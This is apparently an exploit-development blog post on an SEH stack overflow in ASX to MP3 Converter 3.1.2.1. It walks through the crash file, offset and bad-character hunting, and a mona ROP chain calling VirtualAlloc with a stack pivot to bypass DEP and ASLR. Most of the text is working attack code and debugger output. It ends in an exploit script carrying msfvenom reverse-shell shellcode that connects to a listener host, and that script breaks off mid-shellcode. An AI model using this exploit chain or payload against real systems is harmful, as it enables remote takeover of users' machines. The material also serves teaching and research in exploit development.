
ASX to MP3 Converter 3.1.2.1 DEP and ASLR bypass using ROP gadgets

Test environment: Windows 10 21H2, 32-bit, with system-wide DEP enabled. This post looks at how to bypass DEP and ASLR.

No question about it: the first step is to find out how many bytes are needed to crash the program. I'll skip the routine steps and talk about a few small pitfalls I ran into.

Reference: the exploit-db entry https://www.exploit-db.com/exploits/14191. A length of `50000` bytes is used here.

```python
#!/usr/bin/python3

total_size = 50000
filename = "crash.asx"
junk = b"A" * total_size  # 50000 bytes of padding to trigger the crash
with open(filename, "wb") as filehandle:
    filehandle.write(junk)
```

When the program crashed, the SEH chain had been overwritten:

[screenshot: seh]

So this is an SEH-based stack overflow, and both DEP and ASLR have to be bypassed.

Finding the offset brought a small pitfall. The pattern can be generated with msf-pattern_create -l 50000, or with !py mona pc 50000 after loading mona in windbg. Generating it is no problem; the trouble came when pinning down the exact offset.

Look at the offset that mona reports in windbg:

[screenshot: seh]

Now look at the offset that msf-pattern_offset reports:

[screenshot: seh]

The correct offset turned out to be 43474. My feeling is that the pattern is so long that strings inside it repeat, and windbg's mona does not search all the way through but stops at the first match. So when looking for an offset, it is best to cross-check with both tools, and if several values match, try each of them.
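To check the repetition explanation above, here is an added example that is not from the original post: it rebuilds the cyclic-pattern scheme that msf-pattern_create and mona pc share (assumed here to be upper/lower/digit triplets that start over once all 6760 are used) and lists every position of a 4-byte slice, where a single search stops at the first hit. The 43474 offset is the post's; the slice searched for is taken from the generated pattern itself.

```python
#!/usr/bin/env python3
"""Why a 50000-byte cyclic pattern can yield several offset candidates.

Added example, not from the post: it rebuilds the Aa0Aa1...Zz9 scheme that
msf-pattern_create and mona pc use (assumed: upper/lower/digit triplets that
cycle once all 6760 are used) and lists every position of a 4-byte slice
instead of only the first hit a single search returns."""
import string
import struct

PERIOD = 26 * 26 * 10 * 3  # 20280 bytes before the triplets start to repeat


def pattern_create(length):
    """Cyclic pattern of `length` bytes in the msf-pattern_create scheme."""
    triplets = [(u + lo + d).encode() for u in string.ascii_uppercase
                for lo in string.ascii_lowercase for d in string.digits]
    one_cycle = b"".join(triplets)
    return (one_cycle * (length // PERIOD + 1))[:length]


def offsets(pattern, needle):
    """Every position of needle in pattern; a plain find() gives only the first."""
    hits, pos = [], pattern.find(needle)
    while pos != -1:
        hits.append(pos)
        pos = pattern.find(needle, pos + 1)
    return hits


def offsets_for_dword(pattern, value):
    """Same lookup for a register value as windbg shows it (little-endian)."""
    return offsets(pattern, struct.pack("<I", value))


if __name__ == "__main__":
    pat = pattern_create(50000)
    at_seh = pat[43474:43478]  # the slice sitting at the post's real offset
    print(at_seh, "occurs at", offsets(pat, at_seh))
```

Run as a script it prints the slice found at 43474 together with all three positions it occupies in a 50000-byte pattern; the first hit alone would point 40560 bytes too early.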

[screenshot: seh]

The offset is correct. Note the box marked in red; there is a small detail here: right after 42424242 the memory is overwritten with ffffffff, which should be the tail of the SEH chain. Later, while hunting for bad characters, 04030201 cannot be found, because it has been overwritten by that ffffffff. Because of this, when the exploit is written later, a run of \x90 can follow the offset before the shellcode, so that the shellcode is not overwritten and left unable to execute.

Note that when hunting for bad characters, the bad-character string has to be located first. windbg's search can be used for this: first get the current stack's size and address range with !teb, then search:

```
0:000> !teb
TEB at 003cf000
    ExceptionList:        000fbca8
    StackBase:            00150000
    StackLimit:           000e0000
    SubSystemTib:         00000000
    FiberData:            00001e00
    ArbitraryUserPointer: 00000000
    Self:                 003cf000
    EnvironmentPointer:   00000000
    ClientId:             000010cc . 00001adc
    RpcHandle:            00000000
    Tls Storage:          006dba30
    PEB Address:          003ce000
    LastErrorValue:       0
    LastStatusValue:      c0000034
    Count Owned Locks:    0
    HardErrorMode:        0
0:000> s -a 000e0000 00150000 BBBB
```

The search command is:

```
s -a 000e0000 00150000 BBBB
```

[screenshot: seh]

Clearly the first bad character is 09; 0a was later found to be a bad character as well:

[screenshot: seh]

The final bad characters are \x00\x09\x0a.

A bit of background: for an SEH-based stack overflow with DEP enabled, the SEH exploitation method discussed earlier for the non-DEP case cannot be used. Once DEP is on, the stack is not executable; the earlier SEH approach combined P/P/R with a JMP, and after P/P/R runs, execution jumps to the JMP instruction, which sits on the stack and therefore cannot execute. The correct approach is to overwrite the SEH handler with an instruction that transfers control straight into the ROP chain.

With the ASLR bypass in mind: when building the ROP chain, if the program does not leak some function's address at runtime, a DLL without ASLR must be chosen; otherwise the base address could be computed first and the ROP chain built from gadgets expressed as relative addresses. Here a DLL without ASLR is chosen:

[screenshot: seh]

When letting mona generate the ROP chain automatically, generation failed, as shown below:

*** [ Python ] ***

```python
def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        #[---INFO:gadgets_to_set_ebp:---]
        0x10031e12, # POP EBP # RETN [MSA2Mfilter03.dll]
        0x10031e12, # skip 4 bytes [MSA2Mfilter03.dll]
        #[---INFO:gadgets_to_set_ebx:---]
        0x10013734, # POP EBX # RETN [MSA2Mfilter03.dll]
        0xffffffff, #
        0x100319d3, # INC EBX # FPATAN # RETN [MSA2Mfilter03.dll]
        0x100319d3, # INC EBX # FPATAN # RETN [MSA2Mfilter03.dll]
        #[---INFO:gadgets_to_set_edx:---]
        0x00000000, # [-] Unable to find gadget to put 00001000 into edx
        #[---INFO:gadgets_to_set_ecx:---]
        0x10021292, # POP ECX # RETN [MSA2Mfilter03.dll]
        0xffffffff, #
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        #[---INFO:gadgets_to_set_edi:---]
        0x1001a514, # POP EDI # RETN [MSA2Mfilter03.dll]
        0x1002a602, # RETN (ROP NOP) [MSA2Mfilter03.dll]
        #[---INFO:gadgets_to_set_esi:---]
        0x100218a9, # POP ESI # RETN [MSA2Mfilter03.dll]
        0x1002ab52, # JMP [EAX] [MSA2Mfilter03.dll]
        0x1002f9ed, # POP EAX # RETN [MSA2Mfilter03.dll]
        0x1005d060, # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll]
        #[---INFO:pushad:---]
        0x10014720, # PUSHAD # RETN [MSA2Mfilter03.dll]
        #[---INFO:extras:---]
        0x100371f5, # ptr to 'call esp' [MSA2Mfilter03.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()
```

Note that it reports no gadget found to set EDX. Building the gadgets that set EDX involves EBX, so the gadgets that set EBX have to be moved after the ones that set EDX. Here is the EDX-setting gadget sequence I built:

```python
        #[---INFO:gadgets_to_set_edx:---]
        0x100319c0, # POP EDX # RETN
        0x80808080, # First value to be added
        0x1001505a, # POP EBX # RETN
        0x7f7f8f80, # Second value to be added
        0x10029f3e, # ADD EDX,EBX # POP EBX # RETN 0x10
        0xdeadbeaf,
        0x10018487, # POP ECX # RETN [MSA2Mfilter03.dll]
        0x41414141,
        0x41414141,
        0x41414141,
        0x41414141,
```

Because of the RETN 0x10 instruction, one of the ECX-setting gadgets has to be placed in the middle of the EDX-setting gadgets: RETN 0x10 pops the address of POP ECX # RETN and then skips the next 0x10 bytes of stack, which is what the four 0x41414141 dwords are for.

The ROP gadgets after the modification are as follows:

```python
import struct

def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        #[---INFO:gadgets_to_set_ebp:---]
        0x100501df, # POP EBP # RETN [MSA2Mfilter03.dll]
        0x100501df, # skip 4 bytes [MSA2Mfilter03.dll]
        #[---INFO:gadgets_to_set_edx:---]
        0x100319c0, # POP EDX # RETN
        0x80808080, # First value to be added
        0x1001505a, # POP EBX # RETN
        0x7f7f8f80, # Second value to be added
        0x10029f3e, # ADD EDX,EBX # POP EBX # RETN 0x10
        0xdeadbeaf,
        0x10018487, # POP ECX # RETN [MSA2Mfilter03.dll]
        0x41414141,
        0x41414141,
        0x41414141,
        0x41414141,
        # 0x00000000, # [-] Unable to find gadget to put 00001000 into edx
        #[---INFO:gadgets_to_set_ecx:---]
        0xffffffff, #
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        #[---INFO:gadgets_to_set_ebx:---]
        0x1001505a, # POP EBX # RETN [MSA2Mfilter03.dll]
        0xffffffff, #
        0x100319d3, # INC EBX # FPATAN # RETN [MSA2Mfilter03.dll]
        0x100319d3, # INC EBX # FPATAN # RETN [MSA2Mfilter03.dll]
        #[---INFO:gadgets_to_set_edi:---]
        0x100290a8, # POP EDI # RETN [MSA2Mfilter03.dll]
        0x1002a602, # RETN (ROP NOP) [MSA2Mfilter03.dll]
        #[---INFO:gadgets_to_set_esi:---]
        0x100217e1, # POP ESI # RETN [MSA2Mfilter03.dll]
        0x1002ab52, # JMP [EAX] [MSA2Mfilter03.dll]
        0x1002ca2d, # POP EAX # RETN [MSA2Mfilter03.dll]
        0x1005d060, # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll]
        #[---INFO:pushad:---]
        0x10014720, # PUSHAD # RETN [MSA2Mfilter03.dll]
        #[---INFO:extras:---]
        0x100371f5, # ptr to 'call esp' [MSA2Mfilter03.dll]
    ]
    return b''.join(struct.pack('<I', _) for _ in rop_gadgets)
```

A small point worth knowing. RETN: first EIP = [ESP] (the dword at the top of the stack), then ESP = ESP + 4. RETN N: first EIP = [ESP], then ESP = ESP + 4 + N.
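Applying these RETN rules to the reordered chain, here is an added example that is not code from the post or from mona: it walks the chain above dword by dword using only the gadget semantics written in its comments and reports the register state at PUSHAD, which is where the VirtualAlloc arguments come from. Initial register values are assumed to be zero (every register the call uses is loaded by the chain itself), and the PUSHAD-frame layout is the usual one for a mona VirtualAlloc chain.

```python
#!/usr/bin/env python3
"""Walk the reordered ROP chain from this post up to PUSHAD and decode the
VirtualAlloc arguments it sets up.  Added example, not from the post or mona:
only the gadget semantics in the chain comments (POP/INC/ADD/RETN n/PUSHAD)
are modelled, enough to check the EBX/EDX ordering and the RETN 0x10 skip."""
import struct

MASK = 0xFFFFFFFF
BAD_CHARS = b"\x00\x09\x0a"  # the post's final bad-character list
# (dword, gadget comment) in stack order; "" marks a data slot a POP consumes.
CHAIN = [
    (0x100501df, "POP EBP # RETN"),
    (0x100501df, ""),  # skip 4 bytes: VirtualAlloc returns into this gadget
    (0x100319c0, "POP EDX # RETN"),
    (0x80808080, ""),  # first addend (no \x00 bytes)
    (0x1001505a, "POP EBX # RETN"),
    (0x7f7f8f80, ""),  # second addend; the sum wraps to 0x00001000
    (0x10029f3e, "ADD EDX,EBX # POP EBX # RETN 0x10"),
    (0xdeadbeaf, ""),  # eaten by the gadget's POP EBX
    (0x10018487, "POP ECX # RETN"),
] + [(0x41414141, "")] * 4 + [  # the 0x10 bytes that RETN 0x10 steps over
    (0xffffffff, ""),
] + [(0x10031d7e, "INC ECX # AND EAX,8 # RETN")] * 65 + [
    (0x1001505a, "POP EBX # RETN"),  # EBX is set only now, after the ADD
    (0xffffffff, ""),
    (0x100319d3, "INC EBX # FPATAN # RETN"),
    (0x100319d3, "INC EBX # FPATAN # RETN"),
    (0x100290a8, "POP EDI # RETN"),
    (0x1002a602, ""),  # RETN (ROP NOP)
    (0x100217e1, "POP ESI # RETN"),
    (0x1002ab52, ""),  # JMP [EAX]
    (0x1002ca2d, "POP EAX # RETN"),
    (0x1005d060, ""),  # IAT slot holding &VirtualAlloc
    (0x10014720, "PUSHAD # RETN"),
    (0x100371f5, ""),  # ptr to 'call esp'
]

def run_chain(chain):
    """Execute chain until PUSHAD; return (regs, esp), esp being a chain index."""
    regs = {r: 0 for r in ("eax", "ecx", "edx", "ebx", "ebp", "esi", "edi")}
    eip, esp = 0, 1  # the stack pivot's own RETN enters the chain at slot 0
    while True:
        for ins in chain[eip][1].split("#"):
            op, _, args = ins.strip().partition(" ")
            if op == "POP":
                regs[args.lower()] = chain[esp][0]
                esp += 1
            elif op == "INC":
                regs[args.lower()] = (regs[args.lower()] + 1) & MASK
            elif op == "ADD":
                dst, src = (a.strip().lower() for a in args.split(","))
                regs[dst] = (regs[dst] + regs[src]) & MASK
            elif op == "RETN":  # EIP = [ESP]; ESP += 4 + n, counted in dwords
                eip, esp = esp, esp + 1 + (int(args, 16) if args else 0) // 4
                break  # resume at the gadget just popped
            elif op == "PUSHAD":
                return regs, esp  # the ESP PUSHAD saves becomes lpAddress
            # AND EAX,8 and FPATAN are ignored: EAX is reloaded by POP EAX
        else:  # ran into a data slot with no RETN: the chain has desynced
            raise ValueError(f"executed a data slot at chain index {eip}")

def virtualalloc_args(chain):
    """Read the PUSHAD frame as mona's VirtualAlloc chain does: after EDI (ROP
    NOP) and ESI (JMP [EAX]) come lpAddress=ESP, dwSize=EBX, flags=EDX, ECX."""
    regs, esp = run_chain(chain)
    return {"lpAddress_slot": esp, "dwSize": regs["ebx"],
            "flAllocationType": regs["edx"],  # 0x1000 = MEM_COMMIT
            "flProtect": regs["ecx"],  # 0x40 = PAGE_EXECUTE_READWRITE
            "VirtualAlloc_IAT": regs["eax"]}

def has_bad_chars(chain, bad=BAD_CHARS):  # any byte the target would mangle?
    blob = b"".join(struct.pack("<I", dword) for dword, _ in chain)
    return any(b in blob for b in bad)

if __name__ == "__main__":
    print({k: hex(v) for k, v in virtualalloc_args(CHAIN).items()})
```

Moving the EBX gadgets back in front of the EDX block, as mona originally emitted them, leaves EBX = 0xdeadbeaf at PUSHAD, which is exactly why the post reorders them.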

With the ROP gadgets built, the remaining question is how to make execution land on the first gadget of the ROP chain when the SEH handler runs. It must land exactly on the first gadget; no \x90 padding may be placed in front of the chain. This differs from the \x90 padding before the shellcode: the chain is driven by RETN instructions, so \x90 padding would make \x90\x90\x90\x90 the value loaded into EIP, which points to an invalid address. The \x90 padding before the shellcode works because a JMP ESP is used: even if execution lands in the \x90 region, \x90\x90\x90\x90 is never loaded into EIP as a value; EIP points at the \x90 bytes and simply steps through these NOPs until it reaches the first shellcode instruction.

For now, set the SEH handler value to \xcc\xcc\xcc\xcc, run again, and when the overflow happens look at the distance between the ROP chain and ESP at that moment:

```
(1c78.1948): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\Program Files\Mini-stream\ASX to MP3 Converter\ASX2MP3Converter.exe
eax=02816040 ebx=90909090 ecx=00001102 edx=00000001 esi=90909090 edi=02816040
eip=00430402 esp=000f1254 ebp=02816040 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
ASX2MP3Converter+0x30402:
00430402 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> !teb
TEB at 0026e000
    ExceptionList:        000fbca8
    StackBase:            00150000
    StackLimit:           000e0000
    SubSystemTib:         00000000
    FiberData:            00001e00
    ArbitraryUserPointer: 00000000
    Self:                 0026e000
    EnvironmentPointer:   00000000
    ClientId:             00001c78 . 00001948
    RpcHandle:            00000000
    Tls Storage:          063ba458
    PEB Address:          0026d000
    LastErrorValue:       206
    LastStatusValue:      c0000034
    Count Owned Locks:    0
    HardErrorMode:        0
0:000> s -d 000e0000 00150000 100501df
00109d00  100501df 100501df 100319c0 80808080  ................
00109d04  100501df 100319c0 80808080 1001505a  ............ZP..
0:000> ? 00109d00 - esp
Evaluate expression: 101036 = 00018aac
```

The distance between the two is 18aach. Now a ROP gadget that moves ESP by at least 18aach is needed to replace the value in the SEH handler. Use the following command:

```
!py mona stackpivot -n -m MSA2Mfilter03.dll -distance 101036 -cpb '\x00\x09\x0a'
```

[screenshot: seh]

The results are saved to the file stackpivot.txt. Here is part of its content:

[screenshot: seh]

The gadget at address 0x1001f35f is chosen here. But it moves ESP by 19000h, which would land inside the ROP chain, so some \x90 bytes have to be added in front of the chain so that ESP points exactly at its first gadget. The exact count can only be settled by repeated debugging, mainly because the added \x90 bytes also take up space and lengthen the distance between ESP and the ROP chain. The final \x90 length is 57424. I also wondered whether this value would push the final payload outside the stack. I checked:

[screenshot: seh]

The stack is large enough, so no problem.

The final exploit code is as follows:

```python
#!/usr/bin/python3
import struct


total_size = 50000
filename = "exploit.asx"

#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.91.137 LPORT=4444 EXITFUNC=thread -f python -v shellcode -b '\x00\x09\x0a'
shellcode = b""
shellcode += b"\xda\xd6\xbb\x78\xef\x7a\x2d\xd9\x74\x24\xf4"
shellcode += b"\x5a\x31\xc9\xb1\x52\x83\xea\xfc\x31\x5a\x13"
shellcode += b"\x03\x22\xfc\x98\xd8\x2e\xea\xdf\x23\xce\xeb"
shellcode += b"\xbf\xaa\x2b\xda\xff\xc9\x38\x4d\x30\x99\x6c"
shellcode += b"\x62\xbb\xcf\x84\xf1\xc9\xc7\xab\xb2\x64\x3e"
shellcode += b"\x82\x43\xd4\x02\x85\xc7\x27\x57\x65\xf9\xe7"
shellcode += b"\xaa\x64\x3e\x15\x46\x34\x97\x51\xf5\xa8\x9c"
shellcode += b"\x2c\xc6\x43\xee\xa1\x4e\xb0\xa7\xc0\x7f\x67"
shellcode += b"\xb3\x9a\x5f\x86\x10\x97\xe9\x90\x75\x92\xa0"
shellcode += b"\x2b\x4d\x68\x33\xfd\x9f\x91\x98\xc0\x2f\x60"
shellcode += b"\xe0\x05\x97\x9b\x97\x7f\xeb\x26\xa0\x44\x91"
shellcode += b"\xfc\x25\x5e\x31\x76\x9d\xba\xc3\x5b\x78\x49"
shellcode += b"\xcf\x10\x0e\x15\xcc\xa7\xc3\x2e\xe8\x2c\xe2"
shellcode += b"\xe0\x78\x76\xc1\x24\x20\x2c\x68\x7d\x8c\x83"
shellcode += b"\x95\x9d\x6f\x7b\x30\xd6\x82\x68\x49\xb5\xca"
shellcode += b"\x5d\x60\x45\x0b\xca\xf3\x36\x39\x55\xa8\xd0"
shellcode += b"\x71\x1e\x76\x27\x75\x35\xce\xb7\x88\xb6\x2f"
shellcode += b"\x9e\x4e\xe2\x7f\x88\x67\x8b\xeb\x48\x87\x5e"
shellcode += b"\xbb\x18\x27\x31\x7c\xc8\x87\xe1\x14\x02\x08"
shellcode += b"\xdd\x05\x2d\xc2\x76\xaf\xd4\x85\xb8\x98\xdb"
shellcode += b"\xdc\x51\xdb\xe3\xcf\xfd\x52\x05\x85\xed\x32"
shellcode += b"\x9e\x32\x97\x1e\x54\xa2\x58\xb5\x11\xe4\xd3"
shellcode += b"\x3a\xe6\xab\x13\x36\xf4\x5c\xd4\x0d\xa6\xcb"
shellcode += b"\xeb\xbb\xce\x90\x7e\x20\x0e\xde\x62\xff\x59"
shellcode += b"\xb7\x55\xf6\x0f\x25\xcf\xa0\x2d\xb4\x89\x8b"
